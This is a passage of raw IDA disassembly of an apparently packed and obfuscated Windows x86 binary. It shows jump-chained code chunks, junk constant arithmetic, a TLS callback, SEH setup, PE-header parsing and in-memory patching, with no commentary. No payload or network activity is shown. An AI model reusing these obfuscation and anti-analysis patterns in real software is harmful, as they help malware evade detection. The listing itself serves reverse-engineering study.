jmp loc_428041
; END OF FUNCTION CHUNK FOR sub_423BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4220B7
loc_429E29: ; CODE XREF: sub_4220B7+12�j
jmp loc_429CE1
; END OF FUNCTION CHUNK FOR sub_4220B7
; ---------------------------------------------------------------------------
mov ebx, edx
mov edx, [eax]
mov [edi], esi
adc esi, edi
jmp loc_42C560
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_173. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42269A
loc_429E3C: ; CODE XREF: sub_42269A+8A2A�j
mov ebx, [ecx]
loc_429E3E: ; CODE XREF: _94j21ax3:loc_4235D2�j
jnb nullsub_139
test edi, eax
jmp loc_429FE3
; END OF FUNCTION CHUNK FOR sub_42269A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EFA
loc_429E4B: ; CODE XREF: sub_424EFA:loc_4263E1�j
push 67F15A61h
pop ebx
xor ebx, 0FEAA10C4h
and ebx, 0D3D6D66h
add ebx, 0F6E6B7DCh
popf
jmp loc_426EA4
; END OF FUNCTION CHUNK FOR sub_424EFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422764
loc_429E69: ; CODE XREF: sub_422764:loc_426F0A�j
jl loc_427992
loc_429E6F: ; CODE XREF: sub_428BBD+21CF�j
jmp loc_421AF3
; END OF FUNCTION CHUNK FOR sub_422764
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_429E74: ; CODE XREF: sub_42284F+48A6�j
jmp loc_423781
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
ror esi, 13h
and edi, edx
jmp loc_42798A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851E
loc_429E83: ; CODE XREF: sub_42851E:loc_42B82F�j
push 0B396DF57h
pop edi
add edi, 4CAB6125h
mov [edi], eax
pop edi
jmp loc_422E09
; END OF FUNCTION CHUNK FOR sub_42851E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_429E97: ; CODE XREF: sub_422866:loc_422288�j
call sub_42B9E8
push ecx
push 53F76536h
pop ecx
add ecx, 0BCF43B96h
add ecx, ebp
add ecx, 0EF145F2Ch
jmp loc_429515
; END OF FUNCTION CHUNK FOR sub_422866
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_165. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429EB7: ; CODE XREF: _94j21ax3:00423AAB�j
sub edx, 0AB9C75C0h
; =============== S U B R O U T I N E =======================================
sub_429EBD proc near ; CODE XREF: sub_421F28+9794�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00429AC2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042C0A7 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
lea eax, [ebp-14h]
push eax
push edx
push 0F6946B77h
pop edx
jmp loc_429AC2
sub_429EBD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422048
loc_429ED1: ; CODE XREF: sub_422048:loc_424D40�j
push offset sub_4271A0
jmp loc_42525C
; END OF FUNCTION CHUNK FOR sub_422048
; =============== S U B R O U T I N E =======================================
sub_429EDB proc near ; CODE XREF: _94j21ax3:00429F59�p
; _94j21ax3:0042C43F�j
; FUNCTION CHUNK AT 0042A654 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A86F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042BDEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BF8A SIZE 0000000A BYTES
mov [esp+0], edx
pop edx
test al, al
jz loc_42A86F
jmp loc_42BDEF
sub_429EDB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_429EEC: ; CODE XREF: sub_425934:loc_42A2E1�j
pushf
cmp eax, 2327C915h
jmp loc_429505
; END OF FUNCTION CHUNK FOR sub_425934
; =============== S U B R O U T I N E =======================================
sub_429EF8 proc near ; CODE XREF: sub_4220B7-1026�p
; _94j21ax3:004237FD�j
mov [esp+0], eax
pop eax
mov eax, [ebp-1Ch]
jmp loc_42C306
sub_429EF8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_429F04: ; CODE XREF: sub_423614:loc_422FE6�j
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_426D3D
mov eax, [ebp-1Ch]
shl eax, 8
mov edx, [ebp-20h]
jmp loc_42C2F8
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
loc_429F1C: ; DATA XREF: sub_42AADB-38BB�o
mov ds:dword_4219AC, eax
retn
; ---------------------------------------------------------------------------
loc_429F23: ; CODE XREF: _94j21ax3:0042A8AA�j
jmp loc_4235D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_429F28: ; CODE XREF: sub_423324+5D24�j
jmp loc_426CA8
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AADB
loc_429F2D: ; CODE XREF: sub_42AADB+D�j
rol eax, 0Fh
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42AADB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F9E
loc_429F32: ; CODE XREF: sub_426F9E+1�j
jmp loc_422175
; END OF FUNCTION CHUNK FOR sub_426F9E
; =============== S U B R O U T I N E =======================================
sub_429F37 proc near ; CODE XREF: sub_421402+23A1�j
push ebp
jmp loc_425873
sub_429F37 endp
; ---------------------------------------------------------------------------
loc_429F3D: ; CODE XREF: _94j21ax3:00421B93�j
sbb eax, 0F4B58C54h
; =============== S U B R O U T I N E =======================================
sub_429F43 proc near ; CODE XREF: sub_4248E7-1828�p
mov [esp+0], ebx
pop ebx
mov eax, ds:dword_429F74
mov edx, [ebp-4]
jmp loc_428C80
sub_429F43 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call sub_42875C
call sub_429EDB
; START OF FUNCTION CHUNK FOR sub_425934
loc_429F5E: ; CODE XREF: sub_425934+6649�j
jmp loc_426BC9
; ---------------------------------------------------------------------------
loc_429F63: ; CODE XREF: sub_425934+B26�j
jmp nullsub_183
; END OF FUNCTION CHUNK FOR sub_425934
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_429F68: ; CODE XREF: sub_423324-11C8�j
jmp loc_42A584
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
db 0BDh, 0C6h, 64h
dword_429F70 dd 1959DFA0h ; DATA XREF: sub_429974-7990�r
dword_429F74 dd 143930h ; DATA XREF: sub_422973+7�r
; sub_426FE1-1440�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4239A5
loc_429F78: ; CODE XREF: sub_4239A5+15�j
jmp loc_421F58
; END OF FUNCTION CHUNK FOR sub_4239A5
; ---------------------------------------------------------------------------
db 32h, 94h, 91h
dword_429F80 dd 8DDF9DE5h ; DATA XREF: sub_42A277-47B3�w
; _94j21ax3:00428DD1�w ...
dword_429F84 dd 56DDF9E7h ; DATA XREF: sub_422AD5�r
; sub_423F55+2FA9�w ...
dword_429F88 dd 61BBBF3Dh ; DATA XREF: _94j21ax3:00423BDA�r
; _94j21ax3:loc_42C3B2�w
dword_429F8C dd 51DBBF3Ah ; DATA XREF: sub_42A63F+9�w
; _94j21ax3:loc_42BD57�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C149
loc_429F90: ; CODE XREF: sub_42C149-71FC�j
jmp nullsub_148
; END OF FUNCTION CHUNK FOR sub_42C149
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427849
loc_429F95: ; CODE XREF: sub_427849:loc_423E39�j
mov eax, [ebp-4]
cmp byte ptr [eax], 0EBh
jmp loc_42A598
; ---------------------------------------------------------------------------
loc_429FA0: ; CODE XREF: sub_427849:loc_42784F�j
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
jmp loc_428B97
; END OF FUNCTION CHUNK FOR sub_427849
; ---------------------------------------------------------------------------
loc_429FAB: ; CODE XREF: _94j21ax3:loc_422EE0�j
xchg ecx, ebp
mov byte ptr [ebp-1], 0
mov eax, cs
xor al, al
or eax, eax
jmp loc_42670B
; ---------------------------------------------------------------------------
loc_429FBC: ; DATA XREF: sub_42C473-15DB�o
call sub_423B78
mov edx, [ebx+3Ch]
mov edx, [ebx+edx+80h]
push offset sub_427DD1
jmp locret_4291F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_429FD5: ; CODE XREF: sub_4272E9-3A93�j
add edx, 4453C34Bh
xchg edx, [esp+0]
jmp loc_42C34E
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42269A
loc_429FE3: ; CODE XREF: sub_42269A+77AC�j
jno loc_42BFD7
loc_429FE9: ; CODE XREF: sub_42269A:loc_42B0B8�j
add ecx, 0EE9B5EC2h
xchg ecx, [esp+0]
jmp loc_428F60
; END OF FUNCTION CHUNK FOR sub_42269A
; ---------------------------------------------------------------------------
push eax
ror eax, 0Bh
mov ds:dword_4219B8, eax
jmp loc_42226C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423081
loc_42A006: ; CODE XREF: sub_423081:loc_4259F6�j
push eax
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jmp loc_42B2D7
; END OF FUNCTION CHUNK FOR sub_423081
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42773C
loc_42A016: ; CODE XREF: sub_42773C:loc_42A3A2�j
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
jmp loc_4266EB
; END OF FUNCTION CHUNK FOR sub_42773C
; ---------------------------------------------------------------------------
loc_42A022: ; CODE XREF: _94j21ax3:00426E56�j
; DATA XREF: sub_425330+1B10�o
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425330
loc_42A024: ; CODE XREF: sub_425330+1B02�j
mov eax, [ebp+arg_4]
cmp dword ptr [eax-4], 4
jnz loc_429859
jmp loc_42229F
; END OF FUNCTION CHUNK FOR sub_425330
; ---------------------------------------------------------------------------
shl edi, 0Fh
jmp loc_4280A2
; ---------------------------------------------------------------------------
loc_42A03E: ; CODE XREF: _94j21ax3:00424DA6�j
jns loc_4275F3
adc eax, esi
jmp sub_42C5E8
; ---------------------------------------------------------------------------
or edi, 356138B1h
jmp sub_429054
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_42A057: ; CODE XREF: sub_421F28+1FA4�j
jmp nullsub_149
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4225B5
loc_42A05C: ; CODE XREF: sub_4225B5+8�j
jmp nullsub_92
; END OF FUNCTION CHUNK FOR sub_4225B5
; =============== S U B R O U T I N E =======================================
sub_42A061 proc near ; DATA XREF: sub_421ABD+76F5�o
push 477108EBh
pop eax
call sub_4289B3
sub_42A061 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_427ABD
loc_42A06C: ; CODE XREF: sub_427ABD+B�j
jmp loc_42B6DF
; END OF FUNCTION CHUNK FOR sub_427ABD
; ---------------------------------------------------------------------------
loc_42A071: ; CODE XREF: _94j21ax3:0042AFA4�j
mov byte ptr [eax], 0C3h
call sub_42574E
mov edx, 0A22F8A70h
call sub_422048
jmp loc_428293
; ---------------------------------------------------------------------------
loc_42A088: ; CODE XREF: _94j21ax3:0042A601�j
push offset sub_423A56
jmp loc_42AC8D
; =============== S U B R O U T I N E =======================================
sub_42A092 proc near ; CODE XREF: sub_42B9CF-805C�j
; _94j21ax3:004266E1�p
; FUNCTION CHUNK AT 00424C88 SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
mov edx, 43A8AC5Ch
call sub_4239A5
call sub_42574E
jmp loc_424C88
sub_42A092 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EB4
loc_42A0AA: ; CODE XREF: sub_424EB4:loc_424EC3�j
call sub_42BFF0
loc_42A0AF: ; CODE XREF: sub_427D03:loc_428459�j
mov ds:dword_426F44, eax
lea eax, [ebp-14h]
xor edx, edx
call sub_428AE1
call sub_429BC2
jmp loc_42B88C
; END OF FUNCTION CHUNK FOR sub_424EB4
; =============== S U B R O U T I N E =======================================
sub_42A0C8 proc near ; DATA XREF: sub_42A0CC-660F�o
add esp, 4
retn
sub_42A0C8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42A0CC proc near ; CODE XREF: sub_4246B9�p sub_42AC17+6�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00421618 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042239B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042346A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004234BE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004234D4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042356D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004238B8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00423911 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423A10 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00423AB6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00423F69 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004246A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424A6E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424BCD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004250AC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042699B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426D93 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004274BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042775F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00427C89 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00427D4C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042859D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00428BB1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429171 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004293E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004295AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004298D5 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0042A183 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AAA9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042AB58 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042B6D2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042B87E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042C5DD SIZE 0000000B BYTES
push large dword ptr fs:0
mov large fs:0, esp
jmp loc_423911
sub_42A0CC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42A0DF: ; CODE XREF: sub_42B9CF+8�j
jnz loc_429467
loc_42A0E5: ; CODE XREF: _94j21ax3:loc_42274A�j
jmp loc_42BFEB
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42A0EA: ; CODE XREF: sub_422EB0-9E2�j
mov dword ptr [ebp+eax*4-70h], 73257325h
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 19h
jnz loc_4224C5
jmp loc_4292F8
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422DF2
loc_42A104: ; CODE XREF: sub_422DF2+11�j
call sub_421799
pop ecx
mov eax, [ebp-4]
mov edx, [ebp-8]
; END OF FUNCTION CHUNK FOR sub_422DF2
; START OF FUNCTION CHUNK FOR sub_4289B3
loc_42A110: ; CODE XREF: sub_4289B3+17�j
xchg eax, [edx]
jmp loc_4245A3
; END OF FUNCTION CHUNK FOR sub_4289B3
; =============== S U B R O U T I N E =======================================
sub_42A117 proc near ; DATA XREF: _94j21ax3:loc_4285DC�o
add ebx, 3EA1B940h
xchg ebx, [esp+0]
jmp sub_4239A5
sub_42A117 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42221F
loc_42A125: ; CODE XREF: sub_42221F+A�j
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
; END OF FUNCTION CHUNK FOR sub_42221F
; START OF FUNCTION CHUNK FOR sub_421DC4
loc_42A12D: ; CODE XREF: sub_421DC4:loc_42192E�j
mov [ebp-10h], eax
mov eax, [ebp-10h]
mov eax, [eax+60h]
add eax, [ebp-4]
jmp loc_428910
; END OF FUNCTION CHUNK FOR sub_421DC4
; ---------------------------------------------------------------------------
loc_42A13E: ; CODE XREF: _94j21ax3:0042C088�j
jns loc_427530
adc eax, 0E60532AEh
push edi
push 384E4385h
pop edi
rol edi, 9
sub edi, 94453D7Eh
xor edi, 7D109B64h
jmp loc_4247B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42A165: ; CODE XREF: sub_42284F:loc_422115�j
jz loc_42AB9A
jmp loc_423946
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_42A170: ; CODE XREF: sub_422866:loc_421E23�j
jz loc_423E68
jmp loc_42486B
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
add esi, ebp
jmp loc_42ADA0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42A183: ; CODE XREF: sub_42A0CC-372B�j
jmp loc_427D4C
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422392
loc_42A188: ; CODE XREF: sub_422392+965�j
jmp loc_42A28E
; END OF FUNCTION CHUNK FOR sub_422392
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_42A18D: ; CODE XREF: sub_421689+685�j
jmp nullsub_140
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421114
loc_42A192: ; CODE XREF: sub_421114+D�j
xchg esi, [esp+4+var_4]
jmp sub_42C057
; END OF FUNCTION CHUNK FOR sub_421114
; ---------------------------------------------------------------------------
loc_42A19A: ; DATA XREF: sub_4251A2+6884�o
pop edi
cmp dword ptr [ebp-4], 0
; START OF FUNCTION CHUNK FOR sub_42ADA2
loc_42A19F: ; CODE XREF: sub_42ADA2-626D�j
jz loc_426C46
jmp loc_4278E1
; END OF FUNCTION CHUNK FOR sub_42ADA2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_42A1AA: ; CODE XREF: sub_424C37-2372�j
pushf
call sub_422E7B
; END OF FUNCTION CHUNK FOR sub_424C37
; START OF FUNCTION CHUNK FOR sub_42B706
loc_42A1B0: ; CODE XREF: sub_42B706+D�j
jmp loc_4239D3
; END OF FUNCTION CHUNK FOR sub_42B706
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42764C
loc_42A1B5: ; CODE XREF: sub_42764C+C�j
jmp loc_428FC4
; END OF FUNCTION CHUNK FOR sub_42764C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42A1BA: ; CODE XREF: sub_42484C:loc_424726�j
mov [ebp-10h], eax
mov eax, [ebp+8]
mov eax, [eax-10h]
and eax, 7
mov [ebp-14h], eax
jmp loc_427E56
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
shr ebx, 10h
jmp loc_4218E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_42A1D6: ; CODE XREF: TlsCallback_0:loc_426F3C�j
popf
mov edx, [eax]
jmp loc_42352F
; END OF FUNCTION CHUNK FOR TlsCallback_0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42A1DE: ; CODE XREF: sub_423324:loc_4233F1�j
cmp esi, ebp
jmp loc_42BE96
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_42A1E5 proc near ; DATA XREF: sub_4294E3+D�o
xchg eax, [esp+0]
jmp sub_42A67D
sub_42A1E5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A268
loc_42A1ED: ; CODE XREF: sub_42A268:loc_423523�j
mov [ebp+0], edx
jmp sub_42C24F
; END OF FUNCTION CHUNK FOR sub_42A268
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249A9
loc_42A1F5: ; CODE XREF: sub_4249A9:loc_424D4E�j
call sub_42A3EE
test eax, eax
jz loc_427BB3
jmp loc_428B92
; END OF FUNCTION CHUNK FOR sub_4249A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272C3
loc_42A207: ; CODE XREF: sub_4272C3:loc_4251E3�j
add ecx, 3134F4B2h
xchg ecx, [esp+4+var_4]
jmp loc_422DC7
; END OF FUNCTION CHUNK FOR sub_4272C3
; ---------------------------------------------------------------------------
loc_42A215: ; CODE XREF: _94j21ax3:00422254�j
jge loc_429DDC
loc_42A21B: ; CODE XREF: _94j21ax3:loc_4258C0�j
lea eax, [ebp-24h]
push eax
call sub_42A4F4
loc_42A224: ; CODE XREF: _94j21ax3:00429B67�j
jmp loc_42176A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426716
loc_42A229: ; CODE XREF: sub_426716+27E9�j
jmp loc_42102B
; END OF FUNCTION CHUNK FOR sub_426716
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B65
loc_42A22E: ; CODE XREF: sub_426B65-1F9D�j
jmp nullsub_96
; END OF FUNCTION CHUNK FOR sub_426B65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_42A233: ; CODE XREF: sub_421047:loc_423924�j
cmp byte ptr [eax], 0
loc_42A236: ; CODE XREF: _94j21ax3:0042BAE7�j
jnz loc_4280BC
mov eax, [ebp-8]
push offset loc_424C71
jmp nullsub_97
; END OF FUNCTION CHUNK FOR sub_421047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428381
loc_42A249: ; CODE XREF: sub_428381:loc_4256F0�j
jnz loc_428EF3
jmp loc_42671F
; END OF FUNCTION CHUNK FOR sub_428381
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A254 proc near ; CODE XREF: sub_424EB4+A�p
; FUNCTION CHUNK AT 00421F45 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424543 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425068 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427BBD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004286EF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042BD9C SIZE 0000001C BYTES
mov [esp+0], ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_421F45
sub_42A254 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_208. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42A263: ; CODE XREF: _94j21ax3:0042566F�j
jmp loc_42BBDE
; =============== S U B R O U T I N E =======================================
sub_42A268 proc near ; CODE XREF: sub_42BED6�j
; DATA XREF: sub_4294B3+2A19�o
; FUNCTION CHUNK AT 00423523 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042435F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428278 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042A1ED SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042AAD0 SIZE 0000000B BYTES
cmp dword ptr [ebp-4], 1
jnz loc_425077
jmp loc_42AAD0
sub_42A268 endp
; =============== S U B R O U T I N E =======================================
sub_42A277 proc near ; CODE XREF: _94j21ax3:0042646F�j
; _94j21ax3:0042969A�j ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004212A4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00422FA3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424089 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004247DE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425233 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00425AC1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425AD0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042B1F7 SIZE 0000000B BYTES
mov [esp+0], esi
pop esi
or eax, eax
jnz loc_425AD0
jmp loc_42B1F7
sub_42A277 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
popf
jmp sub_422898
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422392
loc_42A28E: ; CODE XREF: sub_422392:loc_42A188�j
jz loc_4211D8
jmp loc_421AE9
; END OF FUNCTION CHUNK FOR sub_422392
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C3BD
loc_42A299: ; CODE XREF: sub_42C3BD:loc_42C3C6�j
test eax, ebx
pop ebx
jz loc_423AB6
jmp loc_42B303
; END OF FUNCTION CHUNK FOR sub_42C3BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42983E
loc_42A2A7: ; CODE XREF: sub_42983E:loc_429843�j
mov esi, 0CE18B087h
jmp loc_423A93
; END OF FUNCTION CHUNK FOR sub_42983E
; =============== S U B R O U T I N E =======================================
sub_42A2B1 proc near ; DATA XREF: sub_42BAD4:loc_4286B2�o
; FUNCTION CHUNK AT 00422292 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429D0F SIZE 00000005 BYTES
call sub_429BC2
test eax, eax
setnz byte ptr [ebp-1]
loc_42A2BC: ; CODE XREF: sub_4235AE+2�j
; _94j21ax3:loc_42670B�j ...
push esi
push 0D110EE06h
pop esi
jmp loc_429D0F
sub_42A2B1 endp
; ---------------------------------------------------------------------------
loc_42A2C8: ; CODE XREF: _94j21ax3:loc_42B834�j
lea eax, [ebp-800h]
push esi
mov esi, ebx
xchg esi, [esp]
mov [esp], eax
call sub_42AFEE
call sub_42A309
; START OF FUNCTION CHUNK FOR sub_425934
loc_42A2E1: ; CODE XREF: sub_425934+690B�j
jmp loc_429EEC
; END OF FUNCTION CHUNK FOR sub_425934
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424627
loc_42A2E6: ; CODE XREF: sub_424627:loc_428B54�j
or ecx, edx
sbb ebx, edx
adc ecx, 21AB3A65h
pop edx
loc_42A2F1: ; CODE XREF: _94j21ax3:00422449�j
pop ebx
pop ecx
jmp loc_429264
; END OF FUNCTION CHUNK FOR sub_424627
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_42A2F8: ; CODE XREF: sub_421689:loc_427C30�j
jz loc_421D04
jmp loc_42645F
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42A303: ; CODE XREF: _94j21ax3:00423D59�j
; sub_428BBD:loc_429C60�j
adc eax, 16270073h
; END OF FUNCTION CHUNK FOR sub_428BBD
; =============== S U B R O U T I N E =======================================
sub_42A309 proc near ; CODE XREF: _94j21ax3:0042A2DC�p
xchg ebx, [esp+0]
pop ebx
test eax, eax
jmp loc_428298
sub_42A309 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42A314: ; CODE XREF: _94j21ax3:loc_42B8BD�j
jnp sub_42ADA2
and ecx, 0D1B2C39Ah
and edi, edx
jmp loc_427256
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421CAA
loc_42A327: ; CODE XREF: sub_421CAA+642F�j
adc ecx, ebx
jmp loc_42998B
; END OF FUNCTION CHUNK FOR sub_421CAA
; ---------------------------------------------------------------------------
loc_42A32E: ; CODE XREF: _94j21ax3:loc_425BB3�j
test al, al
jz loc_4292E6
push esi
call sub_42878A
loc_42A33C: ; CODE XREF: _94j21ax3:00424E2F�j
jmp loc_4299D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42A341: ; CODE XREF: sub_423FCD:loc_42BB75�j
push 8AAC4DF5h
pop eax
add eax, 0F9BB5FA9h
xor eax, 1693967Ch
jmp loc_42C39E
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_42A358 proc near ; CODE XREF: sub_42BB39-4936�p
; _94j21ax3:00428B40�j
mov [esp+0], esi
pop esi
add esp, 0FFFFFFECh
push offset loc_42B3A0
jmp nullsub_101
sub_42A358 endp
; ---------------------------------------------------------------------------
loc_42A369: ; CODE XREF: _94j21ax3:0042B32F�j
pop ecx
; =============== S U B R O U T I N E =======================================
